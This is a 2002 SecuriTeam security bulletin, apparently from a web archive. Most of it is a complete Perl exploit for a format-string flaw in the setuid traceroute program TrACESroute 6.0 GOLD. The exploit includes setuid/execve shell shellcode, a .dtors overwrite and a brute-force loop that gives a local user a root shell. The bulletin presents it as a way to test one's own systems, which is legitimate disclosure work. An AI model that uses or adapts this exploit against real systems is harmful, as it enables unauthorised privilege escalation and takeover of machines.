[EXPL] TrACESroute GOLD Local Format String Exploit

From: support@securiteam.com
Date: 06/18/02


From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 18 Jun 2002 08:11:26 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  TrACESroute GOLD Local Format String Exploit
------------------------------------------------------------------------

SUMMARY

TrACESroute is just another traceroute program. TrACESroute uses RAW
SOCKET, therefore it must be executed under elevated privileges, and
because of that traceroute usually has the attached suid bit. A security
vulnerability in the product allows local user to gain root privileges.
The following is an exploit code that can be used to test your system for
the mentioned vulnerability.

DETAILS

Exploit:
#!/usr/bin/perl

## ---/ tracesex.pl /---------------------------------------------------
##
## TrACESroute 6.0 GOLD local format string exploit
## * tested on Red Hat Linux release 7.2 (Enigma)
## * Jun 12 2002
##
## Author: stringz // thc@drug.org
## Vulnerability discovered by: downbload // downbload@hotmail.com
##
## Developed on the Snosoft Cerebrum test bed. - http://www.snosoft.com
##
## Greets: g463, syphix, S (super), KF, vacuum, dageshi, sozni,
## obscure, jove, rachel, kevin, and all of my 2e2h friends.
##
## ---/ powered by pot /-----------------------------------------------

# setuid + execve shellcode
$kode =
  "\x31\xdb". # xor ebx, ebx
  "\xf7\xe3". # mul ebx
  "\xb0\x17". # mov al, 0x17
  "\xcd\x80". # int 0x80
  "\x31\xc0". # xor eax, eax
  "\x99". # cdq
  "\x52". # push edx
  "\x68\x2f\x2f\x73\x68". # push dword 0x68732f2f
  "\x68\x2f\x62\x69\x6e". # push dword 0x6e69622f
  "\x89\xe3". # mov ebx, esp
  "\x52". # push edx
  "\x53". # push ebx
  "\x89\xe1". # mov ecx, esp
  "\xb0\x0b". # mov al, 0x0b
  "\xcd\x80"; # int 0x80

$vuln = "./tr"; # CHANGE THIS!@#$%!
$dtors = 0x804e48c + 4;;

printf("\n-- TrACESroute 6.0 GOLD local format string exploit\n");
printf("-- Author: stringz // thc\@drug.org\n\n");
printf("-- Vulnerability discovered by: downbload //
downbload\@hotmail.com\n");

$ret_addr = 0xc0000000 - 4
    - (length($vuln) + 1)
    - (length($kode) + 1)
    ;

undef(%ENV); $ENV{'1337'} = $kode;

printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr);
printf("bruteforcing distance (1 .. 300)\n");
sleep(2);

for (1 .. 300) {
    $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
    die("\x0a") if (system("$vuln -T $fmt_str localhost"))
        =~ m/^(0|256|512|32512)$/; # may need a tweak ;)
}

sub
sw_fmtstr_create ($$$)
{
    die("Incorrect number of arguments for sw_fmtstr_create")
        unless @_ == 3;

    my ($dest_addr, $ret_addr, $dist) = @_;
    my ($word, $qword) = (2, 8);

    # $dest_addr = where to write $ret_addr
    # $ret_addr = where to return execution
    # $dist = the calculated distance

    $tmp1 = (($ret_addr >> 16) & 0xffff);
    $tmp2 = $ret_addr & 0xffff;

    if ($tmp1 < $tmp2) {
        $high = $tmp1 - $qword;
        $low = $tmp2 - $high - $qword;

        $dest_addr1 = pack('L', $dest_addr + $word);
        $dest_addr2 = pack('L', $dest_addr);
    }
    else {
        $high = $tmp2 - $qword;
        $low = $tmp1 - $high - $qword;

        $dest_addr1 = pack('L', $dest_addr);
        $dest_addr2 = pack('L', $dest_addr + $word);
    }

    sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn",
            $dest_addr1, $dest_addr2, $high, $dist,
            $low, $dist + 1);
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:thc@drug.org> thc
[@drug.org].

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [NT] Netcat for Windows -e Buffer Overflow
    ... Get your security news from a reliable source. ... push 20646D63h; Push cmd on stack, ... or eax, eax ... mov cl,byte ptr ...
    (Securiteam)
  • [NT] Trillian Pro Rendezvous XMPP HTML Decoding Heap Corruption
    ... Get your security news from a reliable source. ... The specific flaw exists in the Rendezvous / XMPP (Extensible Messaging ... 4900C47E push eax ...
    (Securiteam)
  • Re: Wlan @ bestbuy is cleartext?
    ... >> direct efforts at blame and how to make such toys as ... If folks had not harrassed M$ over the years about how poory they dealt ... with security, do you think we'd now see them now at making security a ... trying to push more tasks upon over worked jack-of-all-trades admins. ...
    (Vuln-Dev)
  • [NT] Remote Buffer overflow Vulnerability in YPOPs!
    ... Get your security news from a reliable source. ... request: ... "\x55" // push ebp ... "\x33\xf6" // xor esi, esi ...
    (Securiteam)
  • Re: Where is terminal services client in PPC 2003?
    ... to access alternative ports. ... I guess you can always tunnel through a VPN if your worried about security over the public ... Al Jarvi (MS-MVP Windows Networking) ... but push up the encryption level? ...
    (microsoft.public.pocketpc)